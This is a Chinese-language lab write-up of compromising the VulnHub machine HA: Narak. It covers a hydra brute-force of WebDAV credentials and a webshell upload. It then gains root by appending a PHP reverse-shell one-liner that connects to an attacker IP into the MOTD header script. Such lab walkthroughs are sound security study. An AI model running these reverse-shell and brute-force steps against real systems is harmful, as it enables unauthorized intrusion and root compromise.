HA: NARAK

靶机地址:https://www.vulnhub.com/entry/ha-narak,569/

导入VM,用nmap获取靶机IP:192.168.99.135

获取开放端口

访问80端口

用dirb扫描网站目录,存在一个webdav的页面

尝试访问,发现需要密码

抓取网站的关键字作为字典

 用hydra爆破,得到账号:yamdoot 密码:Swarg

登陆进去是空的

用cadaver上传webshell到靶机上

 

在kali上用nc进行监听,再访问页面,拿到靶机的shell

 

拿到flag,但是没啥用

 获取存在rwx权限的文件

find / -type f -perm -ug=rwx 2>/dev/null 

得到brainfuck编码  解密得到:chitragupt

测试连接,是inferno用户的密码

 

下一步获取root权限,这里学到了一个新的提权方式,通过motd 文件(ssh的登录欢迎信息,主要还是可读可写可执行权限)来反弹一个root权限的shell

echo "php -r '$sock=fsockopen("192.168.99.128",4444);exec("/bin/bash -i <&3 >&3 2>&3");'" >>/etc/update-motd.d/00-header

 成功获取root权限

 

获取root.txt

 

原文地址:https://www.cnblogs.com/gaonuoqi/p/14932505.html